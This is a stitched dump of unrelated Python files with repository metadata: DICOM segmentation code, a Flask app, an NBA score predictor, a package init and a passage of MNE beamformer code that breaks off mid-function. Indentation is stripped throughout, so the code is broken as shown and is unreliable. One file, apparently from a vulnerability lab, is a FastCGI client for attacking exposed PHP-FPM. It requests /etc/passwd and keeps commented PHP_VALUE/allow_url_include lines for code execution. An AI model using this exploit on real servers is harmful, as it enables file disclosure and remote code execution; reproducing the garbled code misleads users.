xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=file_name+str(range1[i])+'.dcm'
# filename=file_name+str(range1[i])
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
if i >= 1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
return(costMap)
def rawDicomLister(resultList):
# Function exports the DICOM values without any segmentation.
nSlices=len(resultList)-1
slicer = [pydicom.read_file(resultList[0], force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
#filename=file_name+str(range1[i])+'.dcm'
# filename=file_name+str(range1[i])
filename=resultList[i]
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
if i >= 1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
return(costMap)
def superDicomMiner(resultList):
# Function exports the DICOM values with segmentation into tissue types: regular, bone, and soft (blood).
nSlices=len(resultList)-1
slicer = [pydicom.read_file(resultList[0], force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
boneMap=np.zeros([xBor,yBor,nSlices])
bloodMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=resultList[i]
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
imageBone, binaryBone = boneSegmentation(image, [300, 3000])
imageBone = np.uint8(binaryBone)
imageBlood, binaryBlood = boneSegmentation(image, [1, 250])
imageBlood = np.uint8(binaryBlood)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i >= 1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
return(costMap,boneMap,bloodMap)
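# --- Illustrative sketch (added, not part of the original script) ---
# Hedged example of superDicomMiner: given an ordered list of DICOM file paths, it
# stacks the raw slices and the bone/blood masks (HU windows [300, 3000] and [1, 250])
# into three volumes. The file names below are hypothetical.
# demoList = ['slice001.dcm', 'slice002.dcm', 'slice003.dcm']
# rawVol, boneVol, bloodVol = superDicomMiner(demoList)
# print(rawVol.shape, boneVol.max(), bloodVol.max())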
def dicomMiner(file_name,filename,range1):
# Function exports the DICOM values with segmentation into tissue types: regular, bone, and soft (blood).
nSlices=len(range1)-1
slicer = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
boneMap=np.zeros([xBor,yBor,nSlices])
bloodMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=file_name+str(range1[i])+'.dcm'
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
imageBone, binaryBone = boneSegmentation(image, [300, 3000])
imageBone = np.uint8(binaryBone)
imageBlood, binaryBlood = boneSegmentation(image, [1, 250])
imageBlood = np.uint8(binaryBlood)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i >= 1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
return(costMap,boneMap,bloodMap)
def np2Mat(array,fn):
data={'array':array}
nameOut=str(fn)+'.mat'
print(nameOut)
io.savemat(nameOut,data)
def veinMiner(file_name,filename,range1):
nSlices=len(range1)-1
slicer = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=file_name+str(range1[i])+'.dcm'
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
filenameOut1='unaltered'+str(file_name)+str(range1[i])+'.png'
imageV=np.squeeze(np.asarray(image))
imsave(filenameOut1,imageV)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
#plt.imshow(image, cmap = plt.get_cmap('gray'))
#plt.show()
imageVeins=maskedVesselSegmentation(image)
imageVeins=np.where((imageVeins == 0), 255, 0)
imageVeins=imageVeins/imageVeins.max()
imageVeins=np.where((imageVeins == 1), 0, 1)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(imageVeins)
if i >= 1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(imageVeins)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(imageVeins)
filenameOut=str(file_name)+str(range1[i])+'.png'
imsave(filenameOut,imageVeins)
#filenameOut1=str('unaltered')+str(file_name)+str(range1[i])+'.png'
#imsave(filenameOut1,image)
return(costMap)
# Main test
target0=1
if target0==0:
target0=1
target1=11
if target1==0:
target1=1
target2=3
if target2==0:
target2=1
targets=np.array([target0,target1,target2])
lbnd=0
ubnd=284
results=[]
for f in os.listdir('.'):
if f.endswith('.dcm'):
results.append(f)
#file_name = 'image'
#range1=range(lbnd,ubnd)
#filename=file_name+str(range1[0])+'.dcm'
#filename=file_name+str(range1[0])
#rawDicomMap=rawDicomMiner(file_name,filename,range1)
rawDicomMap=rawDicomLister(results)
np2Mat(rawDicomMap,'rawdicom')
dicomMap,boneMap,bloodMap=superDicomMiner(results)
#dicomMap,boneMap,bloodMap=dicomMiner(file_name,filename,range1)
np2Mat(dicomMap,'dicom')
np2Mat(boneMap,'bone')
np2Mat(bloodMap,'blood')
``` |
{
"source": "jnury/sslyze-gui",
"score": 2
} |
#### File: jnury/sslyze-gui/app.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/favicon.ico')
def favicon():
return app.send_static_file('favicon.ico')
@app.route('/api/hello')
def hello():
return 'Hello World !!!'
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
``` |
{
"source": "JnuSimba/vulhub",
"score": 3
} |
#### File: fpm/9615e2420f31048f7e30f3937356cf75/fpm.py
```python
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
def bchr(i):
if PY2:
return force_bytes(chr(i))
else:
return bytes([i])
def bord(c):
if isinstance(c, int):
return c
else:
return ord(c)
def force_bytes(s):
if isinstance(s, bytes):
return s
else:
return s.encode('utf-8', 'strict')
def force_text(s):
if issubclass(type(s), str):
return s
if isinstance(s, bytes):
s = str(s, 'utf-8', 'strict')
else:
s = str(s)
return s
class FastCGIClient:
"""A Fast-CGI Client for Python"""
# private
__FCGI_VERSION = 1
__FCGI_ROLE_RESPONDER = 1
__FCGI_ROLE_AUTHORIZER = 2
__FCGI_ROLE_FILTER = 3
__FCGI_TYPE_BEGIN = 1
__FCGI_TYPE_ABORT = 2
__FCGI_TYPE_END = 3
__FCGI_TYPE_PARAMS = 4
__FCGI_TYPE_STDIN = 5
__FCGI_TYPE_STDOUT = 6
__FCGI_TYPE_STDERR = 7
__FCGI_TYPE_DATA = 8
__FCGI_TYPE_GETVALUES = 9
__FCGI_TYPE_GETVALUES_RESULT = 10
__FCGI_TYPE_UNKOWNTYPE = 11
__FCGI_HEADER_SIZE = 8
# request state
FCGI_STATE_SEND = 1
FCGI_STATE_ERROR = 2
FCGI_STATE_SUCCESS = 3
def __init__(self, host, port, timeout, keepalive):
self.host = host
self.port = port
self.timeout = timeout
if keepalive:
self.keepalive = 1
else:
self.keepalive = 0
self.sock = None
self.requests = dict()
def __connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# if self.keepalive:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
# else:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
try:
self.sock.connect((self.host, int(self.port)))
except socket.error as msg:
self.sock.close()
self.sock = None
print(repr(msg))
return False
return True
def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
length = len(content)
buf = bchr(FastCGIClient.__FCGI_VERSION) \
+ bchr(fcgi_type) \
+ bchr((requestid >> 8) & 0xFF) \
+ bchr(requestid & 0xFF) \
+ bchr((length >> 8) & 0xFF) \
+ bchr(length & 0xFF) \
+ bchr(0) \
+ bchr(0) \
+ content
return buf
def __encodeNameValueParams(self, name, value):
nLen = len(name)
vLen = len(value)
record = b''
if nLen < 128:
record += bchr(nLen)
else:
record += bchr((nLen >> 24) | 0x80) \
+ bchr((nLen >> 16) & 0xFF) \
+ bchr((nLen >> 8) & 0xFF) \
+ bchr(nLen & 0xFF)
if vLen < 128:
record += bchr(vLen)
else:
record += bchr((vLen >> 24) | 0x80) \
+ bchr((vLen >> 16) & 0xFF) \
+ bchr((vLen >> 8) & 0xFF) \
+ bchr(vLen & 0xFF)
return record + name + value
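# Worked example (added comment, not part of the original client): the name-value
# encoding above uses a single length byte when the length is < 128, and a 4-byte
# big-endian length with the high bit set otherwise. For a value of length 300 the
# four length bytes produced by the code above are:
#   (300 >> 24) | 0x80 -> 0x80
#   (300 >> 16) & 0xFF -> 0x00
#   (300 >> 8)  & 0xFF -> 0x01
#    300        & 0xFF -> 0x2C
# i.e. b'\x80\x00\x01\x2c', followed by the name bytes and the value bytes.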
def __decodeFastCGIHeader(self, stream):
header = dict()
header['version'] = bord(stream[0])
header['type'] = bord(stream[1])
header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
header['paddingLength'] = bord(stream[6])
header['reserved'] = bord(stream[7])
return header
def __decodeFastCGIRecord(self, buffer):
header = buffer.read(int(self.__FCGI_HEADER_SIZE))
if not header:
return False
else:
record = self.__decodeFastCGIHeader(header)
record['content'] = b''
if 'contentLength' in record.keys():
contentLength = int(record['contentLength'])
record['content'] += buffer.read(contentLength)
if 'paddingLength' in record.keys():
skiped = buffer.read(int(record['paddingLength']))
return record
def request(self, nameValuePairs={}, post=''):
if not self.__connect():
print('connect failure! please check your fastcgi-server !!')
return
requestId = random.randint(1, (1 << 16) - 1)
self.requests[requestId] = dict()
request = b""
beginFCGIRecordContent = bchr(0) \
+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
+ bchr(self.keepalive) \
+ bchr(0) * 5
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
beginFCGIRecordContent, requestId)
paramsRecord = b''
if nameValuePairs:
for (name, value) in nameValuePairs.items():
name = force_bytes(name)
value = force_bytes(value)
paramsRecord += self.__encodeNameValueParams(name, value)
if paramsRecord:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
if post:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
self.sock.send(request)
self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
self.requests[requestId]['response'] = b''
return self.__waitForResponse(requestId)
def __waitForResponse(self, requestId):
data = b''
while True:
buf = self.sock.recv(512)
if not len(buf):
break
data += buf
data = BytesIO(data)
while True:
response = self.__decodeFastCGIRecord(data)
if not response:
break
if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_ERROR
if requestId == int(response['requestId']):
self.requests[requestId]['response'] += response['content']
if response['type'] == FastCGIClient.__FCGI_TYPE_END:
self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SUCCESS
return self.requests[requestId]['response']
def __repr__(self):
return "fastcgi connect host:{} port:{}".format(self.host, self.port)
if __name__ == '__main__':
client = FastCGIClient('127.0.0.1', 1998, 3, 0)
params = dict()
documentRoot = "/"
uri = '/etc/passwd'
content = 'IEGSEC_XXXX'
params = {
'GATEWAY_INTERFACE': 'FastCGI/1.0',
'REQUEST_METHOD': 'POST',
'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
'SCRIPT_NAME': uri,
'QUERY_STRING': '',
'REQUEST_URI': uri,
'DOCUMENT_ROOT': documentRoot,
'SERVER_SOFTWARE': 'php/fcgiclient',
'REMOTE_ADDR': '127.0.0.1',
'REMOTE_PORT': '9985',
'SERVER_ADDR': '127.0.0.1',
'SERVER_PORT': '80',
'SERVER_NAME': "localhost",
'SERVER_PROTOCOL': 'HTTP/1.1',
'CONTENT_TYPE': 'application/text',
'CONTENT_LENGTH': "%d" % len(content),
#'PHP_VALUE': 'auto_prepend_file = php://input',
#'PHP_ADMIN_VALUE': 'allow_url_include = On'
}
response = client.request(params, content)
print(force_text(response))
``` |
{
"source": "jnuthong/bayesian_predict_nba",
"score": 3
} |
#### File: bayesian_predict_nba/code/NBA.py
```python
import re
import sys
import codecs
import thinkbayes
import datetime
import numpy as np
class NBA(thinkbayes.Suite):
"""
"""
def __init__(self, mu, sigma, name=''):
"""
"""
pmf = thinkbayes.MakeGaussianPmf(mu, sigma, 1)
thinkbayes.Suite.__init__(self, pmf, name=name)
def Likelihood(self, data, hypo):
"""
"""
lam = hypo
k = data
like = thinkbayes.EvalPoissonPmf(k, lam)
return like
def updateSet(self, dataset):
"""
"""
for data in dataset:
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def MakeGoalPmf(suite, high=100, low=0):
"""Makes the distribution of goals scored, given distribution of lam.
suite: distribution of goal-scoring rate
high: upper bound
returns: Pmf of goals per game
"""
metapmf = thinkbayes.Pmf()
for lam, prob in suite.Items():
# TODO: low should not be zero in nba
pmf = thinkbayes.MakePoissonPmf(lam, int(high), low=0)
metapmf.Set(pmf, prob)
mix = thinkbayes.MakeMixture(metapmf, name=suite.name)
return mix
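# --- Illustrative sketch (added, not part of the original script) ---
# Hedged example of combining NBA and MakeGoalPmf: build a prior over a team's scoring
# rate, update it with observed scores, then mix Poisson distributions into a predictive
# score Pmf. The numbers below are made up for illustration.
# demo_team = NBA(mu=105.0, sigma=8.0, name="demo_team")
# demo_team.updateSet([102, 110, 98])
# demo_goal_pmf = MakeGoalPmf(demo_team, high=140)
# print demo_goal_pmf.Mean()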
def main():
"""
"""
info = dict()
date = datetime.datetime.now().strftime("%Y%m%d")
with open("/Users/baidu/Desktop/ThinkBayes/detail/%s" % date) as file_obj:
for line in file_obj:
line = line.strip("\n\r").split(",")
playid, num, side, home, a, b, score, c, d = line
key = side + home
info[key] = [playid, num, a, b, score, c, d]
if len(sys.argv) >= 3:
score = float(sys.argv[2])
else:
score = 0
with open(sys.argv[1]) as file_obj:
line = file_obj.readline()
line = line.strip("\n\r").split(" ")
size, home = line[0:2]
total_mu, total_sigma, side_mu, side_sigma = [float(ele) for ele in line[2:]]
line = file_obj.readline()
line = line.strip("\n\r").split(",")
total_data = [float(ele) for ele in line]
line = file_obj.readline()
line = line.strip("\n\r").split(",")
side_data = [float(ele) for ele in line]
# line = file_obj.readline()
# score = float(line.strip("\n\r"))
line = file_obj.readline()
line = line.strip("\n\r").split(",")
home_data = [float(ele) for ele in line]
home_mu = np.mean(home_data)
home_sigma = np.std(home_data)
side_team = NBA(mu=side_mu, sigma=side_sigma, name="side_team")
home_team = NBA(mu=home_mu, sigma=home_sigma, name="home_team")
total_team = NBA(mu=total_mu, sigma=total_sigma, name="total_team")
total_team.updateSet(home_data)
side_team.updateSet(side_data)
goal_side = MakeGoalPmf(side_team, low=side_mu - side_sigma * 2, high=side_mu + side_sigma * 2)
goal_home = MakeGoalPmf(home_team, low=home_mu - home_sigma * 2, high=home_mu + home_sigma * 2)
goal_total = MakeGoalPmf(total_team, low=total_mu - total_sigma * 2, high=total_mu + total_sigma * 2)
# diff = goal_total - goal_side - goal_side
diff = goal_home - goal_side
key = size + home
home_win = diff.ProbGreater(-1.0 * score)
home_loss = diff.ProbLess(-1.0 * score)
# home_win = diff.ProbGreater(0)
# home_loss = diff.ProbLess(0)
# p_tie = diff.Prob(0)
value = info[key]
print "================ Game start =================="
print size, home, value[1], total_mu, total_sigma, side_mu, side_sigma
print score, value[2], value[3]
print "Home win: %.4f, expected %.4f" % (home_win, home_win * float(value[3]))
print "Side win: %.4f, expected %.4f" % (home_loss, home_loss * float(value[2]))
print "####### Change Score #######"
print value[4], value[5], value[6]
home_win = diff.ProbGreater(-1.0 * float(value[4]))
home_loss = diff.ProbLess(-1.0 * float(value[4]))
print "Home win: %.4f, expected %.4f" % (home_win, home_win * float(value[6]))
print "Side win: %.4f, expected %.4f" % (home_loss, home_loss * float(value[5]))
with open(sys.argv[1]) as file_obj:
print "+++++++++ game detail +++++++++"
data = file_obj.read()
print data
print "================ Game end =================="
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding("utf-8")
main()
``` |
{
"source": "jnvance/cubex",
"score": 3
} |
#### File: cubex/cubex/__init__.py
```python
__version__ = '0.0a'
from cubex.cube import Cube
def open(path):
"""Create a CUBE object."""
cube = Cube()
cube.open(path)
return cube
``` |
{
"source": "jnvandermeer/mne-python",
"score": 2
} |
#### File: mne/beamformer/_compute_beamformer.py
```python
from copy import deepcopy
import numpy as np
from scipy import linalg
from ..cov import Covariance
from ..io.constants import FIFF
from ..io.proj import make_projector, Projection
from ..io.pick import (pick_channels_forward, pick_info)
from ..minimum_norm.inverse import _get_vertno
from ..source_space import label_src_vertno_sel
from ..utils import logger, warn, estimate_rank, verbose, check_fname
from ..channels.channels import _contains_ch_type
from ..time_frequency.csd import CrossSpectralDensity
from ..externals.h5io import read_hdf5, write_hdf5
def _reg_pinv(x, reg, rcond=1e-15):
"""Compute a regularized pseudoinverse of a square array.
Parameters
----------
x : ndarray, shape (n, n)
Square array to invert.
reg : float
Regularization parameter.
rcond : float | 'auto'
Cutoff for small singular values. Singular values smaller (in modulus)
than `rcond` * largest_singular_value (again, in modulus) are set to
zero. Use 'auto' to attempt to automatically set a sane value. Defaults
to 1e-15.
"""
covrank, s = estimate_rank(x, tol='auto', norm=False, return_singular=True)
# This adds the regularization without using np.eye
d = reg * np.trace(x) / len(x)
x = x.copy()
x.flat[::x.shape[0] + 1] += d
if covrank < len(x):
if reg == 0:
warn('Covariance matrix is rank-deficient and no regularization '
'is done.')
if rcond == 'auto':
# Reduce the toleration of the pseudo-inverse to force a solution
s = linalg.svd(x, compute_uv=False)
tol = s[covrank - 1:covrank + 1].mean()
tol = max(
tol,
len(x) * linalg.norm(x) * np.finfo(float).eps
)
rcond = tol / s.max()
if rcond == 'auto':
rcond = 1e-15
return linalg.pinv(x, rcond=rcond), d
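# --- Illustrative sketch (added, not part of the upstream module) ---
# Hedged example of _reg_pinv: it diagonally loads a square covariance matrix by
# reg * trace(x) / n before pseudo-inverting, and returns both the inverse and the
# loading that was added. demo_cov is a hypothetical well-conditioned matrix.
# demo_cov = np.array([[2.0, 0.3], [0.3, 1.0]])
# demo_inv, demo_loading = _reg_pinv(demo_cov, reg=0.05)
# # demo_loading == 0.05 * np.trace(demo_cov) / 2 == 0.075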
def _eig_inv(x, rank):
"""Compute a pseudoinverse with smallest component set to zero."""
U, s, V = linalg.svd(x)
# pseudoinverse is computed by setting eigenvalues not included in
# signalspace to zero
s_inv = np.zeros(s.shape)
s_inv[:rank] = 1. / s[:rank]
x_inv = np.dot(V.T, s_inv[:, np.newaxis] * U.T)
return x_inv
def _setup_picks(info, forward, data_cov=None, noise_cov=None):
"""Return good channels common to forward model and covariance matrices."""
# get a list of all channel names:
fwd_ch_names = forward['info']['ch_names']
# handle channels from forward model and info:
ch_names = _compare_ch_names(info['ch_names'], fwd_ch_names, info['bads'])
# inform about excluding channels:
if (data_cov is not None and set(info['bads']) != set(data_cov['bads']) and
(len(set(ch_names).intersection(data_cov['bads'])) > 0)):
logger.info('info["bads"] and data_cov["bads"] do not match, '
'excluding bad channels from both.')
if (noise_cov is not None and
set(info['bads']) != set(noise_cov['bads']) and
(len(set(ch_names).intersection(noise_cov['bads'])) > 0)):
logger.info('info["bads"] and noise_cov["bads"] do not match, '
'excluding bad channels from both.')
# handle channels from data cov if data cov is not None
# Note: data cov is supposed to be None in tf_lcmv
if data_cov is not None:
ch_names = _compare_ch_names(ch_names, data_cov.ch_names,
data_cov['bads'])
# handle channels from noise cov if noise cov available:
if noise_cov is not None:
ch_names = _compare_ch_names(ch_names, noise_cov.ch_names,
noise_cov['bads'])
picks = [info['ch_names'].index(k) for k in ch_names if k in
info['ch_names']]
return picks
def _compare_ch_names(names1, names2, bads):
"""Return channel names of common and good channels."""
ch_names = [ch for ch in names1 if ch not in bads and ch in names2]
return ch_names
def _check_one_ch_type(info, picks, noise_cov, method):
"""Check number of sensor types and presence of noise covariance matrix."""
info_pick = pick_info(info, sel=picks)
ch_types =\
[_contains_ch_type(info_pick, tt) for tt in ('mag', 'grad', 'eeg')]
if method == 'lcmv' and sum(ch_types) > 1 and noise_cov is None:
raise ValueError('Source reconstruction with several sensor types '
'requires a noise covariance matrix to be '
'able to apply whitening.')
elif method == 'dics' and sum(ch_types) > 1:
warn('The use of several sensor types with the DICS beamformer is '
'not heavily tested yet.')
def _pick_channels_spatial_filter(ch_names, filters):
"""Return data channel indices to be used with spatial filter.
Unlike ``pick_channels``, this respects the order of ch_names.
"""
sel = []
# first check for channel discrepancies between filter and data:
for ch_name in filters['ch_names']:
if ch_name not in ch_names:
raise ValueError('The spatial filter was computed with channel %s '
'which is not present in the data. You should '
'compute a new spatial filter restricted to the '
'good data channels.' % ch_name)
# then compare list of channels and get selection based on data:
sel = [ii for ii, ch_name in enumerate(ch_names)
if ch_name in filters['ch_names']]
return sel
def _check_proj_match(info, filters):
"""Check whether SSP projections in data and spatial filter match."""
proj_data, _, _ = make_projector(info['projs'],
filters['ch_names'])
if not np.array_equal(proj_data, filters['proj']):
raise ValueError('The SSP projections present in the data '
'do not match the projections used when '
'calculating the spatial filter.')
def _check_src_type(filters):
"""Check whether src_type is in filters and set custom warning."""
if 'src_type' not in filters:
filters['src_type'] = None
warn_text = ('The spatial filter does not contain src_type and a robust '
'guess of src_type is not possible without src. Consider '
'recomputing the filter.')
return filters, warn_text
def _prepare_beamformer_input(info, forward, label, picks, pick_ori,
fwd_norm=None):
"""Input preparation common for all beamformer functions.
Check input values, prepare channel list and gain matrix. For documentation
of parameters, please refer to _apply_lcmv.
"""
is_free_ori = forward['source_ori'] == FIFF.FIFFV_MNE_FREE_ORI
if pick_ori in ['normal', 'max-power', 'vector']:
if not is_free_ori:
raise ValueError(
'Normal or max-power orientation can only be picked '
'when a forward operator with free orientation is used.')
elif pick_ori is not None:
raise ValueError('pick_ori must be one of "normal", "max-power", '
'"vector", or None, got %s' % (pick_ori,))
if pick_ori == 'normal' and not forward['surf_ori']:
# XXX eventually this could just call convert_forward_solution
raise ValueError('Normal orientation can only be picked when a '
'forward operator oriented in surface coordinates is '
'used.')
if pick_ori == 'normal' and not forward['src'][0]['type'] == 'surf':
raise ValueError('Normal orientation can only be picked when a '
'forward operator with a surface-based source space '
'is used.')
# Restrict forward solution to selected channels
info_ch_names = [ch['ch_name'] for ch in info['chs']]
ch_names = [info_ch_names[k] for k in picks]
fwd_ch_names = forward['sol']['row_names']
# Keep channels in forward present in info:
fwd_ch_names = [ch for ch in fwd_ch_names if ch in info_ch_names]
forward = pick_channels_forward(forward, fwd_ch_names)
picks_forward = [fwd_ch_names.index(ch) for ch in ch_names]
# Get gain matrix (forward operator)
if label is not None:
vertno, src_sel = label_src_vertno_sel(label, forward['src'])
if is_free_ori:
src_sel = 3 * src_sel
src_sel = np.c_[src_sel, src_sel + 1, src_sel + 2]
src_sel = src_sel.ravel()
G = forward['sol']['data'][:, src_sel]
else:
vertno = _get_vertno(forward['src'])
G = forward['sol']['data']
# Apply SSPs
proj, ncomp, _ = make_projector(info['projs'], fwd_ch_names)
if info['projs']:
G = np.dot(proj, G)
# Pick after applying the projections. This makes a copy of G, so further
# operations can be safely done in-place.
G = G[picks_forward]
proj = proj[np.ix_(picks_forward, picks_forward)]
# Normalize the leadfield if requested
if fwd_norm == 'dipole': # each orientation separately
G /= np.linalg.norm(G, axis=0)
elif fwd_norm == 'vertex': # all three orientations per loc jointly
depth_prior = np.sum(G ** 2, axis=0)
if is_free_ori:
depth_prior = depth_prior.reshape(-1, 3).sum(axis=1)
# Spherical leadfield can be zero at the center
depth_prior[depth_prior == 0.] = np.min(
depth_prior[depth_prior != 0.])
if is_free_ori:
depth_prior = np.repeat(depth_prior, 3)
source_weighting = np.sqrt(1. / depth_prior)
G *= source_weighting[np.newaxis, :]
elif fwd_norm is not None:
raise ValueError('Got invalid value for "fwd_norm". Valid '
'values are: "dipole", "vertex" or None.')
return is_free_ori, ch_names, proj, vertno, G
def _compute_beamformer(method, G, Cm, reg, n_orient, weight_norm,
pick_ori, reduce_rank, rank, is_free_ori,
inversion=None):
"""Compute a spatial filter (LCMV or DICS)."""
# Tikhonov regularization using reg parameter d to control for
# trade-off between spatial resolution and noise sensitivity
if method == 'lcmv':
Cm_inv, d = _reg_pinv(Cm.copy(), reg)
elif method == 'dics':
Cm_inv, _ = _reg_pinv(Cm, reg, rcond='auto')
if weight_norm is not None and inversion != 'single':
# Compute square of Cm_inv used for weight normalization
Cm_inv_sq = np.dot(Cm_inv, Cm_inv)
if weight_norm == 'nai':
# estimate noise level based on covariance matrix, taking the
# smallest eigenvalue that is not zero
noise, _ = linalg.eigh(Cm)
if rank is not None:
rank_Cm = rank
else:
rank_Cm = estimate_rank(Cm, tol='auto', norm=False,
return_singular=False)
noise = noise[-rank_Cm]
# use either noise floor or regularization parameter d
noise = max(noise, d)
# compute spatial filter
W = np.dot(G.T, Cm_inv)
n_sources = G.shape[1] // n_orient
for k in range(n_sources):
Wk = W[n_orient * k: n_orient * k + n_orient]
Gk = G[:, n_orient * k: n_orient * k + n_orient]
if method == 'lcmv' and np.all(Gk == 0.):
continue
Ck = np.dot(Wk, Gk)
if method == 'dics':
# Normalize the spatial filters:
if Wk.ndim == 2 and len(Wk) > 1:
# Free source orientation
if inversion == 'single':
# Invert for each dipole separately using plain division
Wk /= np.diag(Ck)[:, np.newaxis]
elif inversion == 'matrix':
# Invert for all dipoles simultaneously using matrix
# inversion.
Wk[:] = np.dot(linalg.pinv(Ck, 0.1), Wk)
else:
# Fixed source orientation
Wk /= Ck
# compute scalar beamformer by finding the source orientation
# which maximizes output source power
if pick_ori == 'max-power':
if weight_norm is not None and inversion != 'single':
# finding optimal orientation for NAI and unit-noise-gain
# based on [2]_, Eq. 4.47
tmp = np.dot(Gk.T, np.dot(Cm_inv_sq, Gk))
if reduce_rank:
# use pseudo inverse computation setting smallest component
# to zero if the leadfield is not full rank
tmp_inv = _eig_inv(tmp, tmp.shape[0] - 1)
else:
# use straight inverse with full rank leadfield
try:
tmp_inv = linalg.inv(tmp)
except np.linalg.linalg.LinAlgError:
raise ValueError('Singular matrix detected when '
'estimating spatial filters. '
'Consider reducing the rank of the '
'leadfield by using '
'reduce_rank=True.')
power = np.dot(tmp_inv, np.dot(Wk, Gk))
elif weight_norm is not None and inversion == 'single':
# First make the filters unit gain, then apply them to the
# CSD matrix to compute power.
norm = 1 / np.sqrt(np.sum(Wk ** 2, axis=1))
Wk_norm = Wk / norm[:, np.newaxis]
power = Wk_norm.dot(Cm).dot(Wk_norm.T)
else:
if method == 'dics':
# Compute spectral power by applying the spatial filters to
# the CSD matrix.
power = Wk.dot(Cm).dot(Wk.T)
elif method == 'lcmv':
# no weight-normalization and max-power is not implemented
# yet for lcmv beamformer:
raise NotImplementedError('The max-power orientation '
'selection is not yet '
'implemented with weight_norm '
'set to None.')
# compute the orientation:
if method == 'lcmv':
eig_vals, eig_vecs = linalg.eig(power)
if np.iscomplex(eig_vecs).any():
raise ValueError('The eigenspectrum of the leadfield '
'at this voxel is complex. Consider '
'reducing the rank of the leadfield '
'by using reduce_rank=True.')
